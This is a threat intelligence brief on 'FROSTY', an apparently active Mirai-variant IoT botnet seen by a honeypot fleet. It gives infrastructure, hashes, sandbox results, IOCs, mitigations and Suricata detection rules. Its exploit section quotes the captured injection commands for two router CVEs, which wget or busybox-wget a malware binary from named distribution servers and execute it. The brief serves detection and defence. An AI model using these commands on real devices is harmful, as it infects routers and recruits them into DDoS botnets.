FROSTY — Mirai-Lineage Botnet Threat Intel Brief

Executive Summary

Key Finding

Since 2026-05-21, our 36-node distributed honeypot fleet has observed an active IoT botnet campaign distributing a Mirai-variant binary named frosty.mips. The campaign exploits two long-known vulnerabilities — CVE-2014-8361 (Realtek miniigd UPnP RCE) and CVE-2017-17215 (Huawei HG532 SOAP RCE) — to self-propagate across internet-exposed routers and IoT devices. With 33,431 events observed over 31 days across 36 geographically distributed sensors, the campaign is active and ongoing.

The botnet operator has deployed a dual-distribution infrastructure (two independent C2 servers both running Apache 2.4.6 on CentOS) with self-replication argument tracking, indicating a structured and mature operation. Both distributed binaries are confirmed Mirai variants by VirusTotal (41/62 engines for the primary sample) and tria.ge behavioral analysis (score 10/10, YARA: Mirai_MIPS). The actual command-and-control server — 103.106.228.23:80 — is distinct from the distribution nodes and is connection-filtered, responding only to infected devices.

33,431

Total Events

31

Days Active

36

Sensors Hit

41/62

VT Detections

10/10

Triage Score

2

CVEs Exploited

Threat Actor Profile

The "FROSTY" operator has not been attributed to a named threat actor. Based on observed tradecraft, the operation exhibits the following characteristics:

Maturity Indicators

Structured, not opportunistic. Three distinct indicators suggest an organized operator: (1) dual C2 distribution infrastructure with failover; (2) per-device-family self-replication argument tagging (realtek.selfrep / huawei.selfrep) enabling conversion rate tracking by exploit type; (3) two distinct binary builds of different sizes (111 KB and 120 KB) suggesting active development cycles.

Attribute	Assessment	Confidence
Motivation	DDoS-for-hire or DDoS capability building (Mirai lineage)	HIGH
Sophistication	Intermediate — dual infra, selfrep tracking, but relies on ~10-year-old CVEs	HIGH
Attribution	Unknown; no public naming; "frosty" branding not in public threat reports	MED
Target profile	Consumer/SOHO routers (Realtek SDK, Huawei HG532). Primarily APAC/global ISP space.	HIGH
Operational tempo	Continuous (observed every day since 2026-05-21). Surge event 2026-06-17.	HIGH

Infrastructure Analysis

Scanner Nodes ────────────────── Exploit HTTP/SOAP/UPnP

│ │

45.194.67.8 (Huawei scanner — 7,692 hits/8h) ──→ Victim IoT Device

66.132.x.x (233 unique IPs — compromised fleet) ──→ Victim IoT Device

│

wget/busybox fetches payload

│

┌────────────────────┴─────────────────────┐

109.104.153.60 (primary) 86.54.82.179 (backup)

Apache 2.4.6/CentOS Apache 2.4.6/CentOS

/bins/frosty.mips /bins/frosty.mips

120,488 bytes 111,379 bytes

SHA2: 33efcefc... SHA1: f9b2997c...

└──────────────────┬──────────────────┘

bot executes → calls home

│

103.106.228.23:80 (C2)

Raw TCP — connection-filtered

Silent to non-bot clients

PCAP confirmed: ~4.3 KB/session

Distribution Servers

IP	Role	Server	Binary served	SHA256	Size	Directory listing
`109.104.153.60`	Primary dist	Apache 2.4.6 (CentOS)	`/bins/frosty.mips`	`33efcefc…`	120,488 B	403 Blocked
`86.54.82.179`	Backup dist	Apache 2.4.6 (CentOS)	`/bins/frosty.mips`	`f9b2997c…`	111,379 B	403 Blocked

Both distribution nodes run Apache 2.4.6 on CentOS — likely CentOS 7, which reached EOL in June 2024. Directory listing is explicitly disabled (403 Forbidden). The size difference between binaries (9 KB) suggests the two servers are running different build revisions, not identical copies.

Command and Control Server

Active C2

103.106.228.23:80 — Confirmed active C2. Discovered via sandbox detonation of SHA2 (8 separate detonation runs). The binary connects to this IP on port 80 via raw TCP (not HTTP); approximately 4.3 KB exchanged per session. The C2 does not respond to standard HTTP clients, port scanners (nmap returns 0 open ports), or our sandbox WARP IPs — consistent with IP allowlisting or a Mirai-style challenge/response handshake that only responds to registered bot IDs.

IP	Port	Protocol	Nmap	Sandbox	Sessions observed
`103.106.228.23`	80/tcp	Raw TCP (Mirai C2)	0 ports open	Connected / silent	8 (4.1–4.6 KB PCAP each)

Scanner Infrastructure

IP / Range	Unique IPs	Hits (30d)	CVE focus	Notes
`45.194.67.8`	1	7,692	CVE-2017-17215	Dedicated Huawei scanner — blitzed 9 boxes in single 8-hour window (2026-06-17). Single CVE only.
`66.132.x.x`	233	3,469	Both	Distributed scanning fleet — likely compromised hosts
`216.180.x.x`	38	637	Both
`199.45.x.x`	47	601	Both
`152.32.x.x`	42	399	Both

Malware Analysis

Binary Samples

Sample ID	SHA256	Architecture	Size	VirusTotal	Triage
SHA1 (86.x build)	`f9b2997c80753505…`	ELF 32-bit MSB MIPS	111,379 B	Pending	260621-wdaacaev3j 10/10
SHA2 (109.x build)	`33efcefc39dabf81…`	ELF 32-bit MSB MIPS	120,488 B	41/62	260617-weax9sdx3v 10/10

VirusTotal Analysis (SHA2)

VT Verdict — 41/62 Engines

Popular threat label: trojan.mirai/ddos
Popular threat category: Trojan
Type: ELF
Scan date: 2026-06-21 06:04 UTC

Engine	Detection Name
MicroWorld-eScan / BitDefender / GData	`Gen:Variant.Linux.Mirai.1`
Avast	`ELF:Hajime-R [Trj]`
Sophos / ZoneAlarm	`Linux/DDoS-CIA`
Skyhigh / TrellixENS	`Linux/Mirai.l`
ALYac / VIPRE	`Gen:Variant.Linux.Downloader.1`

The Avast detection as ELF:Hajime-R is likely a false family classification due to structural similarities between Mirai and Hajime; the consensus across 11 other engines naming Mirai is more reliable. The Linux/DDoS-CIA label (Sophos) refers to the DDoS component architecture, not a nation-state attribution.

Tria.ge Behavioral Analysis

Sample	Score	Family	YARA Rule	MITRE TTPs	Signatures
SHA1 `f9b2997c…`	10/10	mirai	`Mirai_MIPS`	T1027, T1016	Family: Mirai; XOR string obfuscation (Mozilla/5.0 keyword)
SHA2 `33efcefc…`	10/10	mirai	`Mirai_MIPS`	T1016	Family: Mirai; System Network Configuration Discovery

The SHA1 sample uniquely triggers a signature for XOR-obfuscated strings, specifically a Mozilla/5.0 User-Agent string. Mirai variants commonly XOR-encrypt embedded strings (C2 IP, User-Agent, attack strings) with a single-byte key to evade static analysis — the deobfuscated string is used in HTTP flood attack payloads.

Sandbox Detonation (cowrAI Sandbox — MIPS)

Detonation Notes

SHA2 was successfully detonated 9 times in our MIPS sandbox environment (QEMU MIPS, WARP egress). On first detonation (exec_ok=true, 300s runtime), the binary connected to 103.106.228.23:80 and was killed at timeout. In all 8 subsequent runs, the binary connected to the same C2 but received no commands (exit_kind: c2_silent_bail — C2 alive, bot silenced). The C2 distinguishes between known bots and new connections, refusing to issue commands to unregistered or probing clients.

Run	Date (UTC)	C2 Contacted	exec_ok	Outcome	PCAP
1	2026-06-17 04:47	`103.106.228.23:80`	true	kill (300s timeout)	3,429 B
2	2026-06-17 08:24	`103.106.228.23:80`	false	c2_silent_bail	4,181 B
3	2026-06-17 21:45	`103.106.228.23:80`	false	c2_silent_bail	4,556 B
4–8	2026-06-18 → 2026-06-21	`103.106.228.23:80`	false	c2_silent_bail (all)	~4.3 KB avg

The consistent ~4.3 KB PCAP across all detonation runs suggests a deterministic handshake exchange: the bot sends its registration packet; the C2 acknowledges receipt but issues no commands to sandbox/WARP-egress IPs. In a real infection, this would be followed by the bot sitting idle until the operator issues a DDoS command.

Observed TTPs — MITRE ATT&CK

T1190

Exploit Public-Facing Application

CVE-2014-8361 (Realtek miniigd UPnP RCE), CVE-2017-17215 (Huawei HG532 SOAP RCE)

T1059

Command and Scripting Interpreter

Shell injection via SOAP/XML body. Commands delivered via HTTP POST to exposed management interfaces.

T1105

Ingress Tool Transfer

wget/busybox wget used to fetch frosty.mips from distribution C2 after initial exploitation.

T1027

Obfuscated Files or Information

XOR string obfuscation of embedded strings (C2 IP, User-Agent for HTTP flood). Confirmed by triage signature on SHA1.

T1016

System Network Config Discovery

Confirmed by triage behavioral analysis. Standard Mirai pre-infection reconnaissance.

T1095

Non-Application Layer Protocol

Raw TCP C2

C2 communication on port 80 via raw TCP (not HTTP). ~4.3 KB handshake per session.

T1498

Network Denial of Service

Mirai variant — primary payload capability is DDoS (volumetric). VT label: trojan.mirai/ddos.

T1584.001

Compromise Infrastructure: Botnet

66.132.x.x /16 contributes 233 unique scanning IPs — likely compromised hosts used as scanner infrastructure.

Activity Timeline

2026-05-21

First FROSTY campaign events observed in cowrAI fleet. CVE-2014-8361 + CVE-2017-17215 exploits begin arriving.

2026-06-16

cowrAI chase-runner fetches frosty.mips from 86.54.82.179 for the first time (SHA1). Open-dir probe returns 403. First sandbox detonation queued.

2026-06-17 03:17 UTC

Major surge event. Scanner node 45.194.67.8 hammers 9 fleet nodes with CVE-2017-17215 in an 8-hour window — 7,692 events from a single IP. cowrAI chase-runner independently fetches SHA2 from 109.104.153.60.

2026-06-17 04:47 UTC

First successful detonation of SHA2 in cowrAI MIPS sandbox. Binary runs for 300s, connects to 103.106.228.23:80. Real C2 IP identified.

2026-06-17 → present

Continuous lower-level scanning from distributed fleet (66.132.x.x and others). 8 additional detonation runs of SHA2 — all confirm C2 alive but silent to sandbox clients.

2026-06-21 06:04 UTC

SHA2 (33efcefc…) appears on VirusTotal for the first time — either submitted by another researcher or auto-uploaded. 41/62 engines detect as Mirai.

2026-06-21 (this report)

Both samples submitted to VirusTotal and tria.ge by cowrAI. Full reports published. Campaign ongoing as of report date.

Exploit Payloads

CVE-2014-8361 — Realtek miniigd UPnP RCE

Exploits the NewInternalClient SOAP action in Realtek's miniigd UPnP daemon. The XML body injects a shell command via backtick expansion in the parameter value.

# Primary C2 (109.104.153.60)
`cd /var; rm -rf zuki; wget http://109.104.153.60/bins/frosty.mips -O zuki; chmod 777 zuki; ./zuki realtek.selfrep`

# Backup C2 (86.54.82.179)
`cd /var; rm -rf zuki; wget http://86.54.82.179/bins/frosty.mips -O zuki; chmod 777 zuki; ./zuki realtek.selfrep`

CVE-2017-17215 — Huawei HG532 SOAP RCE

Exploits the NewStatusURL action in Huawei HG532's TR-064 management interface. Uses busybox wget's -g (host) / -r (remote path) / -l (local path) flags.

# Primary C2
$(/bin/busybox wget -g 109.104.153.60 -l /tmp/.frosty.mips -r /bins/frosty.mips; \
  /bin/busybox chmod 777 * /tmp/.frosty.mips; /tmp/.frosty.mips huawei.selfrep)

# Backup C2
$(/bin/busybox wget -g 86.54.82.179 -l /tmp/.frosty.mips -r /bins/frosty.mips; \
  /bin/busybox chmod 777 * /tmp/.frosty.mips; /tmp/.frosty.mips huawei.selfrep)

Self-Rep Argument Significance

The binary is launched with a positional argument identifying the exploit that installed it: realtek.selfrep or huawei.selfrep. In Mirai-lineage code, argv[1] is typically stored and reported to the C2 as metadata, allowing the operator to track which vulnerabilities are most productive for fleet growth. This is a distinguishing operational marker — not all Mirai variants implement selfrep tracking.

Indicators of Compromise

Network IOCs

Distribution C2 — Primary

109.104.153.60

Serves /bins/frosty.mips · Apache 2.4.6/CentOS

Distribution C2 — Backup

86.54.82.179

Serves /bins/frosty.mips · Apache 2.4.6/CentOS

Bot C2

103.106.228.23:80

Raw TCP C2 · Connection-filtered · PCAP confirmed active

Scanner — Primary

45.194.67.8

Dedicated Huawei scanner · 7,692 hits in 8h window

Payload URL

http://109.104.153.60/bins/frosty.mips

Primary payload delivery URL

Payload URL

http://86.54.82.179/bins/frosty.mips

Backup payload delivery URL

File IOCs

SHA256	Filename	Size	Type	Source
`33efcefc39dabf8181aaf22dfab876531a86beb077a0eb87c77c80c5dadf2fa3`	`frosty.mips`	120,488 B	ELF 32-bit MSB MIPS	109.104.153.60
`f9b2997c80753505de598605fb8bdb2ac0abb095a20df9cd39623dd9ceb6a5cf`	`frosty.mips`	111,379 B	ELF 32-bit MSB MIPS	86.54.82.179

Filesystem Artifacts

On-Device Artifacts

After successful exploitation, look for these on affected devices:
/var/zuki — temporary binary name used by Realtek exploit path
/tmp/.frosty.mips — temporary binary name used by Huawei exploit path (hidden file — note the leading dot)
Outbound TCP connections to 103.106.228.23:80 from IoT devices
Unexpected busybox invocations with wget -g <IP> -r /bins/ arguments in router logs

CVE References

CVE	Vendor	Component	Description	First published
CVE-2014-8361	Realtek	miniigd UPnP daemon	RCE via NewInternalClient SOAP action. Affects Realtek SDK v1.3 / v2.0. CVSS 10.0.	2015-04-08
CVE-2017-17215	Huawei	HG532 TR-064 management	RCE via NewStatusURL SOAP action. Exploited in wild by Satori/Okiru Mirai variants within weeks of disclosure. CVSS 8.8.	2018-03-20

Mitigations and Detection

For Network Defenders

Action	Priority	Detail
Block distribution C2s	HIGH	Block outbound HTTP to `109.104.153.60` and `86.54.82.179` at perimeter. Requests to `/bins/` path are definitive.
Block bot C2	HIGH	Block TCP to `103.106.228.23:80`. Affected devices on your network calling this IP are already infected.
Firewall TR-064 (port 7547)	HIGH	CVE-2017-17215 requires access to Huawei HG532's TR-064 interface. Block internet-facing TCP/7547. Also block TCP/37215 and TCP/52869.
Firewall UPnP (port 1900)	HIGH	CVE-2014-8361 targets Realtek miniigd. Disable UPnP on internet-facing interfaces. Block TCP/52869 and UDP/1900 from WAN.
Monitor for scanner IPs	MED	Alert on inbound connections from `45.194.67.8` and `66.132.0.0/16`. Suppress known-good (Shodan/Censys scanner) prefixes to reduce noise.
Hunt for filesystem artifacts	MED	Scan managed devices for `/var/zuki`, `/tmp/.frosty.mips`, and unexpected MIPS ELF files in world-writable directories.

Detection Signatures

# Suricata/Snort — payload delivery
alert http any any -> any any (msg:"FROSTY Mirai payload download"; \
  content:"/bins/frosty.mips"; http_uri; \
  flow:established,to_server; sid:9910001; rev:1;)

# Suricata/Snort — Huawei HG532 exploit inbound
alert http any any -> $HOME_NET 7547 (msg:"FROSTY CVE-2017-17215 exploit attempt"; \
  content:"NewStatusURL"; http_client_body; \
  content:"frosty"; http_client_body; \
  flow:established,to_server; sid:9910002; rev:1;)

# Suricata — outbound C2 beacon
alert tcp $HOME_NET any -> 103.106.228.23 80 (msg:"FROSTY Mirai C2 beacon"; \
  flow:established,to_server; sid:9910003; rev:1;)

Related Campaigns and Attribution Notes

The "frosty" binary name and campaign tradecraft do not match any named threat actor in public sources as of 2026-06-21. Relevant comparisons:

VulnCheck "frost" Botnet (Dec 2025)

VulnCheck documented a "frost" botnet (similar name) in December 2025 that uses different C2 infrastructure (87.121.84.52) and a completely different CVE set (15 CVEs including CVE-2023-1389 TP-Link, CVE-2025-2611 ICTBroadcast). IRC C2 with "220 meow :3" banner. Not the same campaign — coincidental naming or separate operator reusing the theme.

Historical Context — CVE-2014-8361 + CVE-2017-17215 Exploit Pair

Akamai SIRT (March 2025) noted this specific CVE pair is the most common exploit combination in IoT botnet binaries, used in 36+ distinct exploit sets across surveyed malware corpora. The FROSTY campaign appears to be a persistent iteration of this well-worn exploitation pattern, distinguished by its binary branding, dual-C2 redundancy, and self-replication tracking.

Collection Methodology

All data in this report was collected organically by the cowrAI distributed honeypot fleet — 36 cowrie 2.9.17 SSH/Telnet honeypots geographically distributed across 7 providers (Cloudzy, Vultr, DigitalOcean, Netcup, TeamBlue, Hetzner, and others). Fleet nodes also run alt-protocol lure daemons including soaplure (ports 7547, 37215, 52869) which captures Huawei and Realtek SOAP exploit attempts.

Payload URLs discovered via the fleet's automated chase-runner were fetched within minutes of first observation. Binaries were detonated in a dedicated QEMU MIPS sandbox with WARP egress (rotating 16-profile pool) for network isolation. Tria.ge behavioral analysis and VirusTotal lookups were performed via the cowrAI dashboard pipeline.

All events are stored in PostgreSQL with Analytics Engine dual-write for aggregation queries. No interaction with victim networks occurred; all data was observed passively from honeypot sensor nodes.